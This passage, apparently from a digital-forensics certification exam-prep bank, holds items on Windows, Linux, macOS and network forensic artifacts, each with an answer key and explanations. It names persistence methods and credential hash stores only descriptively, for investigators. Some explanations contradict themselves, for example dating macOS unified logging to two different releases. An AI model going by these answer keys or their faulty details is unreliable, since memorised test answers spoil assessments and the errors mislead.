Event ID 7045 indicates that a new service was installed on the Windows system. When an attacker exploits a web shell, they often escalate privileges or establish persistence by installing a malicious service that executes a payload at system startup. Therefore, a 7045 event appearing alongside web shell traffic is a strong indicator of post-exploitation activity, making it the most relevant option.

Why this answer

Event ID 7045 is logged by the Windows Service Control Manager when a new service is installed on the system. An attacker who gains a web shell often installs a malicious service to maintain persistence, and this event captures the service name, binary path, and service type, making it the primary forensic artifact to detect such activity.

Exam trap

The trap here is that candidates confuse event IDs for logon events (4624, 4648) or user creation (4720) with service installation, because they associate persistence broadly with any authentication or account change rather than the specific service creation event.

How to eliminate wrong answers

Option B (4624) is wrong because it logs successful logon events, not service installation; it would show interactive or network logons but not the creation of a service. Option C (4648) is wrong because it records explicit credential use (e.g., RunAs) and is unrelated to service creation. Option D (4720) is wrong because it logs user account creation, not service installation; while an attacker might create a user, the question specifically asks about service installation for persistence.

99
MCQhard

A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?

A.A USB network adapter was attached
B.A USB storage device was attached
C.A USB printer was attached
D.A USB keyboard was attached
AnswerB

The USBSTOR subkey in HKLM\SYSTEM\CurrentControlSet\Enum is populated when Windows enumerates a USB mass-storage device, such as a flash drive, external HDD, or card reader. It creates a subkey named like Disk&Ven_<vid>&Prod_<pid>&Rev_<rev>, and the key's LastWrite time can be used as forensic timeline evidence of the device's most recent connection to the system. This is why this key points directly to a USB storage device.

Why this answer

The registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' specifically enumerates USB mass storage devices (e.g., flash drives, external hard drives). The presence of a subkey with a serial number indicates that a USB storage device was attached and recognized by the Windows operating system, as the serial number uniquely identifies the device. This key is a primary artifact in USB forensics for tracking storage device connections.

Exam trap

EC-Council often tests the misconception that all USB devices (e.g., keyboards, printers) are logged under the same 'USBSTOR' key, but in reality, only mass storage devices appear there, while other USB classes have separate enumeration paths.

How to eliminate wrong answers

Option A is wrong because USB network adapters are enumerated under 'HKLM\SYSTEM\CurrentControlSet\Enum\USB' with a class GUID of '{4d36e972-e325-11ce-bfc1-08002be10318}' (Net class), not under 'USBSTOR'. Option C is wrong because USB printers are enumerated under 'HKLM\SYSTEM\CurrentControlSet\Enum\USBPRINT' or with class GUID '{28d78fad-5a12-11d1-ae5b-0000f803a8c2}', not under 'USBSTOR'. Option D is wrong because USB keyboards are enumerated under 'HKLM\SYSTEM\CurrentControlSet\Enum\USB' with HID class GUID '{745a17a0-74d3-11d0-b6fe-00a0c90f57da}', not under 'USBSTOR'.

100
MCQmedium

A forensic investigator is examining a Linux system and suspects that files were deleted to cover tracks. The investigator runs 'debugfs -R "lsdel" /dev/sda1' on an ext4 file system. The output shows several deleted inodes but does not include file names. What is the MOST likely reason for the missing file names?

A.The file names were encrypted by the attacker, so they do not appear in plain text.
B.The file system was mounted read-only, preventing debugfs from reading directory entries.
C.The debugfs lsdel command only works on ext3 file systems and not on ext4.
D.The ext4 file system does not store file names in the inode; they are stored in directory entries, which are removed upon deletion.
AnswerD

In ext4 (and other Unix-like file systems), file names are not stored in the inode. Instead, directory entries map names to inode numbers. When a file is deleted, the directory entry is removed, but the inode may retain metadata until it is reused. Thus, debugfs lsdel can list deleted inodes but cannot recover original file names from the inode alone. This is why file names are missing from the output.

Why this answer

In ext4, file names are stored in directory entries that map names to inode numbers. When a file is deleted, the directory entry is removed, but the inode may remain allocated or partially intact until reused. The debugfs lsdel command lists deleted inodes, but it cannot retrieve original file names because that information is not stored in the inode.

Therefore, the missing names are expected behavior.

Exam trap

The trap here is assuming that deleted inodes retain file names, when in fact names are stored separately in directory entries and are removed upon deletion.

101
MCQhard

A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?

A.A man‑in‑the‑middle attack
B.A denial‑of‑service (SYN flood) attack
C.A normal HTTPS session initiation
D.A TCP SYN scan (stealth scan)
AnswerD

A TCP SYN scan, also known as a stealth scan or half-open scan, works by sending an SYN packet to a port and observing the response: if SYN-ACK is received, the port is open, and the scanner immediately sends an RST to tear down the connection. This avoids completing the three-way handshake, so the target service never sees a full connection and may not write it to application logs. The captured sequence — SYN, SYN-ACK, RST — exactly matches this behavior. This is why it is correctly identified as a TCP SYN scan, as the RST after SYN-ACK is the signature of an active port-scanning tool like Nmap.

Why this answer

A SYN followed by SYN‑ACK and then RST is typical of a port scan where the scanner sends a SYN, receives a SYN‑ACK (port open), and then immediately resets the connection to avoid completing the handshake.

102
Multi-Selectmedium

Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)

Select 2 answers
A.Nmap
B.The Sleuth Kit (mactime)
C.Autopsy
D.Plaso
E.Wireshark
AnswersB, D

The Sleuth Kit's mactime tool parses the body file format produced by fls and other TSK tools to generate chronological timelines from disk images. It specifically correlates MACB times (modification, access, change, birth) for filesystem objects, enabling investigators to reconstruct file activity across a timeline. As a focused command-line utility within a broader forensic toolkit, mactime is a primary and canonical tool for timeline analysis, which is why this option is correct.

Why this answer

The Sleuth Kit's mactime tool (option B) is correct because it builds a bodyfile of MAC times (modified, accessed, changed, and created timestamps) from file system metadata and renders it into a chronological timeline, which is the core of timeline analysis in digital forensics. Plaso (option D) is also correct because it is a Python-based engine that parses many artifact types and, via its log2timeline/psort components, produces a super-timeline correlating events across sources, making it a primary timeline analysis tool. Autopsy (option C) is a full forensic platform that can display timelines, but it is not primarily a timeline analysis tool in the sense of the dedicated mactime and Plaso utilities.

Nmap (option A) is a network discovery and port-scanning tool, and Wireshark (option E) is a packet capture and protocol analyzer; neither is designed for building forensic event timelines.

Exam trap

EC-Council often tests the distinction between tools that are 'used in forensics' versus those 'primarily for timeline analysis,' so candidates may mistakenly select Autopsy because it is a popular forensics suite, but it is not a dedicated timeline analysis tool like mactime or Plaso.

103
Multi-Selecthard

Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)

Select 3 answers
A.LNK files
B.Registry Run keys
C.Service installations
D.Prefetch files
E.Scheduled tasks
AnswersB, C, E

Run keys under HKCU and HKLM execute specified programs at user logon or system start, giving malware automatic re-execution across reboots. This satisfies the persistence requirement by surviving restarts without further user action, unlike one-off execution or volatile artefacts.

Why this answer

Registry Run keys (B) are a classic Windows persistence mechanism because entries under HKCU\Software\Microsoft\Windows\CurrentVersion\Run or HKLM\...\Run are automatically executed at user logon or system startup. Service installations (C) provide persistence by registering a service with the Service Control Manager (e.g., via sc.exe create or New-Service), allowing malicious code to run at boot under a privileged context. Scheduled tasks (E) persist by creating a task through schtasks.exe or the Task Scheduler COM API that triggers execution at logon, startup, or on a schedule.

LNK files (A) are shortcut files that can execute payloads when clicked but are not an automatic persistence mechanism by themselves, and Prefetch files (D) are forensic artifacts generated by the Windows prefetcher to speed up application launches, not a persistence technique.

Exam trap

EC-CHFI often tests the distinction between execution artifacts (like Prefetch files) and actual persistence mechanisms, leading candidates to mistakenly select Prefetch because it records execution, but it does not cause automatic re-execution.

104
MCQhard

During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?

A.They are both plain-text log files used for system monitoring
B.The diagnostics directory contains binary log data from the unified logging system
C.The diagnostics directory contains compressed archives of system.log
D.These locations are remnants of third-party security software
AnswerB

The diagnostics directory is the on-disk repository for unified logging, introduced in macOS Sierra, where entries are stored in compressed binary tracev3 files. These files capture detailed event-level data with nanosecond timestamps, message metadata, and privacy-scoped redaction, making them a rich source for forensic timelines. Investigators typically query this store with the 'log' command, not with text editors.

Why this answer

/private/var/db/diagnostics/ stores binary log data from Apple's unified logging system (os_log), which is the primary logging mechanism in macOS since Yosemite. Unlike the plain-text /private/var/log/system.log, these binary logs capture high-fidelity, structured diagnostic data that can be queried using the `log` command (e.g., `log show --archive`). This directory is critical for forensic analysis of system events, crashes, and performance issues.

Exam trap

EC-Council often tests the misconception that all macOS logs are plain-text files, leading candidates to overlook the binary unified logging system stored in /private/var/db/diagnostics/.

How to eliminate wrong answers

Option A is wrong because /private/var/db/diagnostics/ does not contain plain-text log files; it stores binary log archives from the unified logging system, while /private/var/log/system.log is a plain-text file. Option C is wrong because the diagnostics directory does not contain compressed archives of system.log; it holds binary .tracev3 and .logarchive files that are independent of the legacy system.log. Option D is wrong because these are native macOS system directories, not remnants of third-party security software; they are part of Apple's core logging infrastructure.

105
MCQhard

A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?

A.http.request
B.ip.proto == 6
C.tcp.port == 80
D.http
AnswerD

The 'http' filter is correct because it selects every packet in which Wireshark's HTTP dissector successfully identifies HTTP protocol data, encompassing requests, responses, status lines, headers, and bodies. Unlike port-based filters, it is application-layer aware and verifies the presence of HTTP semantics, not just a well-known port number. This makes it the precise, protocol-specific filter an SOC analyst should use to capture the complete picture of HTTP traffic on the wire.

Why this answer

The correct filter is 'http' because in Wireshark, simply typing 'http' as a display filter captures all HTTP traffic, including both requests and responses. This is the most straightforward way to isolate all HTTP packets without limiting to a specific direction or port.

Exam trap

The trap here is that candidates often confuse display filters with capture filters or assume that HTTP traffic only uses port 80, leading them to choose 'tcp.port == 80' instead of the simpler and more comprehensive 'http' filter.

How to eliminate wrong answers

Option A is wrong because 'http.request' only filters for HTTP request packets, not responses, so it would miss half the HTTP traffic. Option B is wrong because 'ip.proto == 6' filters for TCP protocol traffic in general, not specifically HTTP, and would include all TCP-based protocols (e.g., SSH, FTP). Option C is wrong because 'tcp.port == 80' filters traffic on TCP port 80, but HTTP can also run on other ports (e.g., 8080, 8000), and it would miss HTTP traffic on non-standard ports.

106
MCQmedium

Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?

A.Prefetch files
B.Jump Lists
C.MRU lists in the registry
D.LNK files
AnswerC

Most Recently Used (MRU) lists in the registry are exactly the artifact designed for tracking recently opened files. For example, HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU stores PIDLs of files selected through common dialog boxes, while application-specific keys like HKCU\Software\Microsoft\Notepad and HKCU\Software\Microsoft\WordPad record the last file paths opened by those applications. These registry values are maintained by the operating system and applications specifically to store this historical MRU data, making them the canonical answer.

Why this answer

The NTUSER.DAT registry hive contains per-user MRU (Most Recently Used) lists that track files recently accessed by specific applications, such as the 'RecentDocs' key for Office applications or 'ComDlg32' for common dialog boxes. These registry keys are explicitly designed to store MRU data, making them the direct artifact for this purpose.

Exam trap

EC-Council often tests the distinction between registry-based MRU lists (stored in NTUSER.DAT) and file-system artifacts like Jump Lists or LNK files, so candidates mistakenly choose Jump Lists because they also track recent files, but they are not stored in the registry hive.

How to eliminate wrong answers

Option A is wrong because Prefetch files are located in the C:\Windows\Prefetch folder and track application launch sequences and file paths for system-wide performance optimization, not per-user MRU lists in the registry. Option B is wrong because Jump Lists are stored as .customDestinations-ms files in the user's AppData\Roaming\Microsoft\Windows\Recent directory and provide a graphical list of recent files for taskbar applications, but they are not stored in the NTUSER.DAT hive. Option D is wrong because LNK files (shortcuts) are stored in the user's Recent folder and other locations, tracking file access via shell link data, but they are not registry-based MRU lists within NTUSER.DAT.

107
Multi-Selectmedium

Which THREE of the following are commonly used network forensic data sources?

Select 3 answers
A.NetFlow logs
B.Prefetch files
C.IDS/IPS alerts
D.Packet captures (PCAP)
E.Windows registry hives
AnswersA, C, D

NetFlow logs are network-level metadata records generated by Cisco and other network devices that summarize traffic flows between hosts. Each flow record contains the source and destination IP addresses, ports, protocol, timestamps, total bytes and packets, and sometimes TCP flags — but critically no payload content. This makes NetFlow valuable for high-level pattern analysis such as detecting command-and-control beacons, anomalous data-transfer volumes, or internal lateral movement, while remaining relatively lightweight to store. As a core source of network telemetry, NetFlow is a mainstream network forensics artifact.

Why this answer

NetFlow logs (A) are a core network forensic source because routers and switches export flow records containing metadata such as source/destination IP, ports, protocol, byte/packet counts, and timestamps, enabling traffic pattern and anomaly analysis without full payload capture. IDS/IPS alerts (C) are network forensic data because they record detections of malicious or policy-violating traffic (e.g., Snort/Suricata signatures, anomaly events) with associated IPs, ports, and timestamps that support incident reconstruction. Packet captures (D) are the richest network forensic source, preserving full packet payloads at layers 2–7 (typically stored as PCAP/PCAPNG via tools like Wireshark or tcpdump) for protocol-level and content analysis.

Prefetch files (B) and Windows registry hives (E) are host-based artifacts stored on the endpoint's filesystem, not network traffic data sources, so they do not belong in this list.

Exam trap

The CHFI exam often tests the distinction between host-based forensic artifacts (like Prefetch files and registry hives) and network-based forensic sources, so candidates mistakenly include local system artifacts when the question explicitly asks for network forensic data sources.

108
MCQmedium

A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?

A.HKLM\SAM\SAM\Domains\Account\Users
B.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
C.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
D.NTUSER.DAT\Software\Microsoft\Windows\ShellNoRoam\BagMRU
AnswerB

USBSTOR enumerates storage-class USB devices, recording vendor, product and serial number for each device ever attached. This key sits under the SYSTEM hive's CurrentControlSet, making it the definitive artefact for proving historical USB mass-storage connections on Windows 10.

Why this answer

The USBSTOR key under HKLM\SYSTEM\CurrentControlSet\Enum stores the device instance IDs and class GUIDs for every USB mass storage device that has ever been connected to the system. This is the primary forensic artifact for enumerating historical USB device attachments on Windows 10.

Exam trap

The EC-Council CHFI exam often tests the misconception that USB device history is stored in the SAM hive or in user-specific NTUSER.DAT shell bags, when in fact the definitive list resides in the SYSTEM hive's USBSTOR enumeration key.

How to eliminate wrong answers

Option A is wrong because HKLM\SAM\SAM\Domains\Account\Users contains local user account password hashes and security identifiers (SIDs), not USB device connection history. Option C is wrong because HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run stores startup programs and autorun entries, not USB device enumeration data. Option D is wrong because NTUSER.DAT\Software\Microsoft\Windows\ShellNoRoam\BagMRU tracks folder view settings and shell bag MRU (most recently used) data for Explorer, not USB device identifiers.

109
MCQmedium

A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?

A.Log file
B.Executable binary
C.Email database
D.Property list file
AnswerD

A .plist (property list) file is Apple's structured serialization format for key-value pairs, arrays, and typed data, encoded as either XML or binary (with the 'bplist00' header). It is used pervasively for configuration—such as Info.plist for app metadata, preferences in ~/Library/Preferences, and app-specific data containers. The extension directly identifies this format, and forensic examiners routinely parse plists to extract settings, timestamps, and user activity, which is why this option is correct.

Why this answer

The .plist extension stands for 'property list', a structured data file used by macOS and iOS applications to store serialized objects like configuration settings, user preferences, and application state. These files are XML or binary-encoded and are a key artifact in forensic analysis for recovering user activity, application usage, and system configuration. Option D is correct because .plist files are explicitly defined as property list files in Apple's developer documentation.

Exam trap

The CHFI exam often tests the misconception that .plist files are log files because they store application data, but they are specifically property list files used for configuration and preferences, not event logs.

How to eliminate wrong answers

Option A is wrong because .plist files are not log files; macOS logs are typically stored in .log, .asl, or .tracev3 formats under /var/log or via the unified logging system. Option B is wrong because executable binaries on macOS use Mach-O format with extensions like .app, .dylib, or no extension, and .plist files are data files, not executable code. Option C is wrong because email databases on macOS are stored in .mbox, .emlx, or SQLite formats (e.g., in ~/Library/Mail/), not as .plist files.

110
Multi-Selectmedium

Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)

Select 2 answers
A.NTUSER.DAT
B.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
C.prefetch files
D.setupapi.dev.log
E.Event ID 7045
AnswersB, D

The registry key HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR is one of the most reliable artifacts for identifying USB storage devices. Under this key, each subkey corresponds to a specific device class and serial number, such as 'Disk&Ven_Kingston&Prod_DataTraveler&Rev_1.00' followed by the unique instance ID. It persists on the system even after the device is unplugged, enabling examiners to prove that a particular USB flash drive or external hard drive was connected at some point. This makes it a cornerstone of USB device forensic analysis.

Why this answer

The USBSTOR registry key and setupapi.dev.log contain information about USB devices connected to the system, including device IDs and timestamps.

111
MCQhard

During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?

A.The server is running a scheduled backup to an external cloud service
B.The server is performing legitimate Windows Update checks
C.The server is infected with malware that is beaconing to a command-and-control server
D.The server is being used as a proxy for internal users
AnswerC

The correct indicator set is process-name spoofing combined with network beaconing: the malware uses the legitimate name svchost.exe but executes from the Temp folder, which no built-in Windows service does because the Service Control Manager loads service binaries using the full ImagePath—normally C:\Windows\System32\svchost.exe. The attacker then creates periodic outbound connections at fixed or jittered intervals to a small set of external IPs, typically carrying small, encrypted payloads, to receive commands or exfiltrate data—a classic C2 beacon signature. Defenders observe a single host producing repeatable timing patterns with low data volume per connection, which is nearly pathognomonic for malware.

Why this answer

Svchost.exe running from C:\Windows\Temp is a classic sign of malware masquerading as a legitimate Windows process. The regular outbound connections on port 443 (HTTPS) at fixed intervals indicate beaconing behavior, where the infected host periodically contacts a command-and-control (C2) server to receive instructions or exfiltrate data. Legitimate svchost.exe resides in C:\Windows\System32, and any deviation from this path is a strong indicator of compromise.

Exam trap

EC-Council CHFI exam often tests the misconception that svchost.exe is always legitimate, but the key trap here is that the process path (C:\Windows\Temp) is abnormal, and candidates may overlook this detail and incorrectly assume the activity is a normal Windows Update or backup operation.

How to eliminate wrong answers

Option A is wrong because scheduled backups to cloud services typically use dedicated backup software or Windows Server Backup, not svchost.exe from a non-standard path, and would not exhibit regular beaconing intervals. Option B is wrong because legitimate Windows Update checks use svchost.exe from C:\Windows\System32, not C:\Windows\Temp, and updates are initiated by the Windows Update service (wuauserv) via HTTP/HTTPS on port 80/443 but not at rigidly regular intervals. Option D is wrong because using a server as a proxy for internal users would involve a proxy service (e.g., Squid, Microsoft TMG) or a configured proxy role, not svchost.exe from a temp directory, and would show connections from multiple internal clients, not just outbound from the server.

112
MCQmedium

A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?

A.They store the user's web browsing history
B.They list all network connections made by the system
C.They record the first and last execution times of applications
D.They contain the actual content of user documents
AnswerC

Prefetch is designed as a performance mechanism, but forensically it acts as an application execution artifact: each .pf file contains a 'last run time' header field and a run count, while the file's creation timestamp indicates when the executable was first executed. This combination lets an analyst reconstruct first and last run times (and frequency) for programs like browsers, document viewers, and executables of interest, even if the system timezone offset must be accounted for during parsing. Because Prefetch files are created automatically for commonly run executables and are plain binary files, tools such as PECmd or Prefetch Parser can extract these timestamp values reliably.

Why this answer

Prefetch files in Windows store metadata about application launches, including the first and last execution times. This allows forensic analysts to determine when a specific program was run, which is crucial for timeline analysis and identifying unauthorized or malicious software execution.

Exam trap

EC-Council often tests the misconception that Prefetch files contain user data or network logs, but they only store execution metadata; candidates confuse Prefetch with other artifacts like browser cache or event logs.

How to eliminate wrong answers

Option A is wrong because web browsing history is stored in browser-specific locations (e.g., Chrome's History file, IE's index.dat) and not in Prefetch files. Option B is wrong because network connections are logged via Netstat or Windows Firewall logs, not Prefetch; Prefetch only tracks application execution. Option D is wrong because Prefetch files contain metadata (e.g., timestamps, file paths, run count) and never the actual content of user documents.

113
Multi-Selecthard

A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)

Select 3 answers
A.~/.bash_history
B./var/log/syslog
C./etc/passwd
D./var/log/auth.log
E./etc/crontab
AnswersA, D, E

~/.bash_history records commands typed in interactive Bash sessions, revealing executed tooling, downloaded payloads and reconnaissance. This satisfies the stem's command execution and persistence constraint, since it directly evidences what the operator ran on the suspected C2 host.

Why this answer

Option A, ~/.bash_history, is correct because it records the interactive commands executed by a user's Bash shell, which can reveal attacker commands used to establish or operate C2 functionality. Option D, /var/log/auth.log, is correct because on Debian-based Linux systems it captures authentication events such as SSH logins, sudo usage, and failed login attempts, which help trace unauthorized access and privilege escalation tied to persistence. Option E, /etc/crontab, is correct because it is a system-wide cron table where scheduled jobs can be added by attackers to maintain persistence and periodically re-execute malicious commands.

Option B, /var/log/syslog, is not among the marked answers because although it contains general system messages, it is less directly focused on command execution and persistence than the selected artifacts. Option C, /etc/passwd, is not among the marked answers because it primarily lists local user accounts and does not by itself provide evidence of command execution or persistence mechanisms.

Exam trap

EC-ChFI often tests the distinction between logs that record authentication events (auth.log) versus logs that record command execution (bash_history), and candidates may mistakenly choose syslog thinking it captures all system activity, but it does not reliably capture per-user shell commands.

114
MCQeasy

In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?

A.Jumplists
B.Prefetch files
C.LNK files
D.ShellBags
AnswerA

Jumplists are stored as .automaticDestinations-ms and .customDestinations-ms files in the user's Recent folder, implemented as COM Structured Storage (OLE compound file) databases. Each destination contains a stream whose embedded LNK blobs hold metadata about opened files, directories, and tasks, along with timestamps, file paths, and application IDs. Thus they are the best answer for a database of file/application metadata.

Why this answer

Jumplists are the correct answer because they are a Windows artifact that stores metadata about recently accessed files and applications, directly populating the 'Recent Items' and 'Quick Access' lists in the taskbar and File Explorer. Each jumplist is a database file (e.g., .automaticDestinations-ms or .customDestinations-ms) containing entries with timestamps, file paths, and application IDs, making them a key source for forensic reconstruction of user activity.

Exam trap

EC-Council often tests the misconception that LNK files (Option C) are the primary artifact for 'Recent Items', but jumplists are the actual database that aggregates and manages these entries, while LNK files are just individual shortcuts that may be referenced within the jumplist.

How to eliminate wrong answers

Option B is wrong because Prefetch files (.pf) are used to speed up application startup by caching file access patterns, not to populate 'Recent Items' or 'Quick Access' lists; they track execution history but not user-accessed file metadata. Option C is wrong because LNK files (.lnk) are shortcuts that point to a specific file or application, but they are not a database of metadata; they are individual artifacts that can appear in jumplists but do not themselves aggregate the 'Recent Items' list. Option D is wrong because ShellBags store folder view settings (e.g., window size, position, and view mode) for Explorer windows, not a database of recently accessed files or applications for 'Recent Items' or 'Quick Access'.

115
MCQeasy

In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?

A.HKLM\Security
B.HKLM\System
C.NTUSER.DAT
D.HKLM\Sam
AnswerD

HKLM\SAM is the loaded registry view of the Security Accounts Manager database, and it contains the local user account hashes under HKLM\SAM\SAM\Domains\Account\Users. Each user key is named by the account's relative identifier (RID), and the V value contains the LM/NTLM hash verifiers used by Windows to authenticate local accounts. This is how the operating system exposes the credential store in the registry, making SAM the correct forensic target.

Why this answer

The SAM (Security Account Manager) database, which stores local user account password hashes (LM and NTLM hashes), is mounted in the Windows registry under the HKLM\SAM hive. This hive is directly accessible only by the SYSTEM account for security reasons, and it contains the hashes in the SAM\SAM\Domains\Account\Users subkey. Option D is correct because HKLM\Sam is the exact registry path where the SAM database resides.

Exam trap

In CHFI, a common mistake is confusing HKLM\Security (stores cached domain credentials) with HKLM\SAM (stores local account hashes). Also, NTUSER.DAT only contains user-specific settings, not system-wide account data.

How to eliminate wrong answers

Option A is wrong because HKLM\Security stores security policy settings, audit policies, and cached domain logon credentials, not the SAM database with local user hashes. Option B is wrong because HKLM\System contains system-wide configuration, device drivers, and control sets (e.g., CurrentControlSet), but not user account hashes. Option C is wrong because NTUSER.DAT is a per-user registry hive loaded under HKEY_CURRENT_USER, containing user-specific settings and preferences, not the system-wide SAM database.

116
MCQeasy

Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?

A.SiLK
B.tcpdump
C.Nmap
D.Wireshark
AnswerA

SiLK (System for Internet-Level Knowledge) is a suite of flow analysis tools designed to collect, store, and query NetFlow/IPFIX flow records. It ingests exported flow data from routers and switches, then uses tools like rwfilter and rwstats to perform high-speed, field-based filtering and statistical aggregation without touching raw packet payloads. This makes it the correct choice for analyzing NetFlow data.

Why this answer

SiLK (System for Internet-Level Knowledge) is specifically designed for large-scale NetFlow data analysis, providing tools to aggregate flow records, identify top talkers (e.g., using rwtop or rwstats), and detect anomalies through statistical baselines. Unlike packet-level tools, SiLK works directly with flow summaries, making it efficient for high-volume network traffic analysis in forensic investigations.

Exam trap

EC-Council often tests the distinction between packet-level forensics (tcpdump/Wireshark) and flow-level forensics (SiLK), trapping candidates who assume Wireshark can analyze NetFlow data because it can capture packets, when in fact NetFlow is a separate export protocol requiring dedicated tools.

How to eliminate wrong answers

Option B (tcpdump) is wrong because it captures raw packets at the interface level, not NetFlow data; it lacks the ability to aggregate flows or identify top talkers from flow records. Option C (Nmap) is wrong because it is a port scanning and network discovery tool, not designed to parse or analyze NetFlow data for anomaly detection. Option D (Wireshark) is wrong because it performs deep packet inspection on live captures or pcap files, but it does not natively consume NetFlow records (e.g., IPFIX or Cisco NetFlow v5/v9) and cannot efficiently summarize flow-level statistics like top talkers.

117
Multi-Selectmedium

A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)

Select 2 answers
A.Jump Lists
B.Event ID 4624 logs
C.Prefetch files
D.System Restore points
E.SAM registry hive
AnswersA, C

Jump Lists are forensic artifacts stored in %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations and CustomDestinations. They maintain MRU (most recently used) lists of files and applications associated with particular AppUserModelIDs, capturing timestamps of when files were opened or saved. This makes them a direct source for determining recently accessed documents and corresponding applications on a per-user basis.

Why this answer

Jump Lists (A) are correct because they are per-application AutomaticDestinations/CustomDestinations files stored under the user's AppData\Roaming\Microsoft\Windows\Recent\ folder that record recently and frequently opened files and programs, directly matching the goal of identifying recently accessed items. Prefetch files (C) are correct because Windows creates .pf files in C:\Windows\Prefetch that track program execution, including run counts and last-run timestamps, which reveal recently executed programs. Event ID 4624 (B) is a Security log entry for successful logons, showing account authentication rather than file or program access.

System Restore points (D) are snapshots used for system rollback and do not directly enumerate recently accessed files or programs. The SAM registry hive (E) stores local user account and credential data, not recent file or program usage.

Exam trap

EC-CHFI often tests the distinction between artifacts that record user activity (Jump Lists, Prefetch) versus those that record system-level events (Event ID 4624) or authentication data (SAM), leading candidates to mistakenly select Event ID 4624 because they associate 'logon' with 'access'.

118
MCQmedium

During a forensic investigation of a Linux system, you need to determine which commands a user executed in their shell session. Which file would you examine to find this information?

A./var/log/auth.log
B./etc/passwd
C./var/log/syslog
D./home/username/.bash_history
AnswerD

.bash_history is the default per-user history file in the home directory of a user running the GNU Bash shell; it records commands interactively typed at the shell's prompt, appended in plain text, and can be read with the 'history' builtin. Each line is one command, and the order generally reflects the order of execution, though Bash does not by default store a timestamp unless HISTTIMEFORMAT is configured. For a forensic investigation this file is the most direct source of a user's command activity, but a sophisticated user can clear or edit the file, and commands running non-interactively or in subshells may not be captured.

Why this answer

The .bash_history file in a user's home directory stores the command history for that user's interactive Bash shell sessions. By default, Bash appends each command to this file when the session ends, making it the primary source for reconstructing a user's executed commands during forensic analysis.

Exam trap

The trap here is that candidates often confuse /var/log/auth.log (which logs authentication events) with command history, but auth.log does not capture the actual commands typed in a shell.

How to eliminate wrong answers

Option A is wrong because /var/log/auth.log records authentication-related events such as login attempts, sudo usage, and SSH connections, not the specific commands executed within a shell session. Option B is wrong because /etc/passwd stores user account information (usernames, UIDs, home directories) and has no relation to command history. Option C is wrong because /var/log/syslog captures general system messages from daemons and kernel, but does not log individual shell commands.

119
MCQhard

A forensics examiner finds a suspicious entry in the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to a PowerShell command. Which persistence mechanism does this represent, and what is the MOST likely impact?

A.Registry run key persistence; the command executes each time the user logs in.
B.Service persistence; the malware runs as a system service.
C.Scheduled task persistence; the command runs at a scheduled time.
D.Bootkit persistence; the malware loads before the OS.
AnswerA

HKCU\...\CurrentVersion\Run entries are per-user autostart locations. Windows reads them at logon and launches the referenced command, so the PowerShell payload executes each time that user signs in, giving the attacker persistent code execution without administrative rights.

Why this answer

The HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key is a standard Windows Run key that automatically executes programs when the user logs in. A PowerShell command placed here will run with the user's privileges at each interactive logon, establishing persistence without requiring elevated privileges or system-level access.

Exam trap

EC-Council often tests the distinction between user-level (HKCU) and machine-level (HKLM) Run keys, and candidates mistakenly associate any registry entry with service persistence or scheduled tasks due to overlapping persistence concepts.

How to eliminate wrong answers

Option B is wrong because service persistence requires entries under HKLM\System\CurrentControlSet\Services or HKCU\Services, not the Run key, and typically runs as SYSTEM or a dedicated service account, not at user logon. Option C is wrong because scheduled task persistence uses the Task Scheduler (schtasks.exe or taskschd.msc) and is stored in %SystemRoot%\Tasks or the Task Scheduler XML files, not in the Run registry key. Option D is wrong because bootkit persistence involves modifying the Master Boot Record (MBR), Volume Boot Record (VBR), or early OS boot components (e.g., bootmgr) to load before the OS kernel, which is entirely unrelated to user-level registry Run keys.

120
MCQeasy

In Linux forensics, which file contains information about user account passwords in hashed form?

A./etc/passwd
B./etc/shadow
C./etc/group
D./var/log/auth.log
AnswerB

The /etc/shadow file stores the actual hashed password for each local user, along with password-aging metadata such as the date of last change, minimum and maximum age, warning period, and account expiration. Access is restricted to root and the shadow group, so its 0640 (or 0000) permissions prevent ordinary users from harvesting hashes for offline brute-force attacks. In a forensic acquisition, this file is a primary source for credential recovery—tools like unshadow combine passwd and shadow to feed hash-cracking utilities like John the Ripper or hashcat.

Why this answer

